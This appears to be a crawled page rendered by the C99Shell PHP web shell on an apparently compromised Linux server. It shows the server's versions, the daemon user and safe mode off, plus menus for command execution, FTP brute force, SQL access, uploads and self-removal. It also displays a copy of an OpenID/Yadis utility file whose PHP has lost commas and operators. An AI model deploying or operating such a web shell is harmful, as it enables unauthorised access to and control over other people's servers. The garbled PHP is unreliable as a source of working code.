!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/lib/Auth/Yadis/   drwxrwxr-x
Free 13.8 GB of 61.93 GB (22.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Misc.php (1.51 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Miscellaneous utility values and functions for OpenID and Yadis.
 *
 * @package OpenID
 * @author JanRain, Inc. <openid@janrain.com>
 * @copyright 2005-2008 Janrain, Inc.
 * @license http://www.apache.org/licenses/LICENSE-2.0 Apache
 */

function Auth_Yadis_getUCSChars()
{
    return array(
                 array(
0xA00xD7FF),
                 array(
0xF9000xFDCF),
                 array(
0xFDF00xFFEF),
                 array(
0x100000x1FFFD),
                 array(
0x200000x2FFFD),
                 array(
0x300000x3FFFD),
                 array(
0x400000x4FFFD),
                 array(
0x500000x5FFFD),
                 array(
0x600000x6FFFD),
                 array(
0x700000x7FFFD),
                 array(
0x800000x8FFFD),
                 array(
0x900000x9FFFD),
                 array(
0xA00000xAFFFD),
                 array(
0xB00000xBFFFD),
                 array(
0xC00000xCFFFD),
                 array(
0xD00000xDFFFD),
                 array(
0xE10000xEFFFD)
                 );
}

function 
Auth_Yadis_getIPrivateChars()
{
    return array(
                 array(
0xE0000xF8FF),
                 array(
0xF00000xFFFFD),
                 array(
0x1000000x10FFFD)
                 );
}

function 
Auth_Yadis_pct_escape_unicode($char_match)
{
    
$c $char_match[0];
    
$result "";
    for (
$i 0$i strlen($c); $i++) {
        
$result .= "%".sprintf("%X"ord($c[$i]));
    }
    return 
$result;
}

function 
Auth_Yadis_startswith($s$stuff)
{
    return 
strpos($s$stuff) === 0;
}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4935 ]--